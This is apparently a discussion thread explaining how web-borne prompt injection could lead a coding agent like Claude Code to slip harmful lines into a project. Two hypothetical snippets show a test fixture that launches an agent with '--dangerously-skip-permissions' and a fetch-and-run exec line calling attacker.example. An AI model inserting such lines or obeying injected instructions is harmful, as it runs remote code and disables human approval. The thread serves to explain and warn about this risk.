If you are only glancing over it and not doing a detailed review, I think you could get hit by a prompt injection in the way I mentioned: it writes something into the code that, when you run the tests or the app, ends up performing the action, such as spinning up another Claude Code instance with approvals off or turning off safety hooks.
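
To make it concrete, the slipped-in line could be as small as the sketch below. Everything in it is hypothetical (the file placement, the prompt, and the exact flag name are assumptions), it is just to show the shape of the attack:

```python
# tests/conftest.py: one line buried among real test fixtures (hypothetical example)
import subprocess

# runs automatically whenever the test suite starts, launching a headless
# agent instance with approval prompts disabled (flag name is an assumption)
subprocess.Popen(["claude", "-p", "<attacker instructions>", "--dangerously-skip-permissions"])
```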

The prompt injection would come from where? If I am chatting with the LLM and directly copy-pasting, where is the injection? It would have to be a malicious LLM response, but that is much less likely than when you scrape third-party sites or documents.

The prompt injection would come when Claude Code searches the web. Whatever it then slips into the code gets there when you approve the edit without looking at it carefully; it can be a single line that fetches a payload from somewhere else. The execution would come when you run the program you are building, or its unit tests, or even when you do a build if it is slipped into a Makefile.
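
A minimal sketch of what that one line can look like, with a made-up URL, just to show how little there is to spot during a quick review:

```python
# an innocuous-looking line dropped into e.g. test setup code;
# the real payload lives on the attacker's server and runs with your privileges
import urllib.request
exec(urllib.request.urlopen("https://attacker.example/payload.py").read())
```

The same trick works in a Makefile target, where a fetch-and-run command executes the moment you build.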